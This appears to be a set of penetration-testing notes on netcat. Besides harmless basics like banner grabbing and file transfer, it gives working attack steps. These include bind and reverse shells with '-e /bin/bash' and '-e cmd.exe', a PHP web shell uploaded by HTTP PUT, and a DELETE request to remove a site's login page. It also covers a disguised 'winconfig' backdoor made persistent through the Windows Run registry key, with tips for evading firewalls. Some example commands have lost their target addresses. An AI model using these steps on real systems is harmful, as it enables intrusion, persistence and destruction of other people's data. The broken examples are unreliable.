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Preinstalled in kali. Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP.

For windows:

For linux:

sudo apt install ncat


It’s used for HTTP

nc $ip <port> -flags

Fingerprinting with netcat

nc $ip 80
HEAD / HTTP/1.0     
# And hit RETURN twice

Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interpelate a service:

 nc -nv $ip <PORT NUMBER>

Netcat commands

As a server

nc -lvp 8888
#-p: specify a port
#-l: to listening
#-v: verbosity
#-u: enforces udp connection
#-e: executes the given command

As a client

nc -v $ip <port>

Transfer data

On the server side:

#data will be printed on screen
nc -lvp <port>  

On the client side:

echo “hello” | nc -v $ip <port>

Transfer data and save it in a file

On the server side:

# Data will be stored in reveived.txt file.
nc -lvp <port> > received.txt   

On the client side:

echo “hello” | nc -v $ip <port>

Transfer file and save it

On the server side:

# Received data will be stored in reveived.txt file.
nc -lvp <port> > received.txt   

On the client side:

cat tobesentfiel.txt | nc -v $ip <port>

Netcat shell

On the server side:

nc -lvp <port> -e /bin/bash

On the client side:

nc -v $ip <port>

Some enumeration techniques for HTTP verbs

# Send a OPTIONS message with netcat
nc 80

Some exploitation techniques for HTTP verbs

DELETE attack

# General syntax for removing a resource from server using netcat
nc 80
DELETE /path/to/resource.txt HTTP/1.0

# Example for removing the login page of a site
nc 80
DELETE /login.php HTTP/1.0

PUT attack: getting a shell

# Save for instance a php basic shell in a file (shell.php):

if (isset($_GET[‘cmd’]))
    $cmd = $_GET[‘cmd’];
    echo ‘<pre>’;
    $result = shell_exec($cmd);
    echo $result;
    echo ‘</pre>’;

# Count the size of the file
wc -m shell.php

# Send with netcat the HTTP verb message
nc 80
PUT /shell.php HTTP/1.0
Conten-type: text/html
Content-length: [number you got with wc -m payload]

# Run the exploit by typing in the browser:

Backdoors with netcat

The attacker initiates the connection

In the victim machine: If windows, get the ncat.exe executable file, rename it to something else such as winconfig and we write in command line:

wincofig -l -p <port> -e cmd.exe
# Example: wincofig -l -p 5555 -e cmd.exe

In the attacker machine:

ncat <victim IP address> <port specified>
# Example: ncat 5555

The victim initiates the connection

Great to avoid firewalls!!!

In the victim machine: If windows, get the ncat.exe executable file, rename it to something else such as winconfig and we write in command line:

winconfig -e cmd.exe <attacker IP> <port>
# Example: winconfig -e cmd.exe 5555
In the attacker machine:

ncat -l -p <port> -v
# Example: ncat -l -p 5555 -v

Creating a registry in regedit

  • In regedit, go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • Right-Button > New > String value
  • We name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>
  • We edit the registry and we add the path to the executable file and some commands in the Value data:
“C:\Windows/System32\winconfig.exe <attacker IP> <port> -e cmd.exe”
# For instance: “C:\Windows/System32\winconfig.exe 5540 -e cmd.exe”
Last update: 2023-07-01
Created: January 3, 2023 12:54:46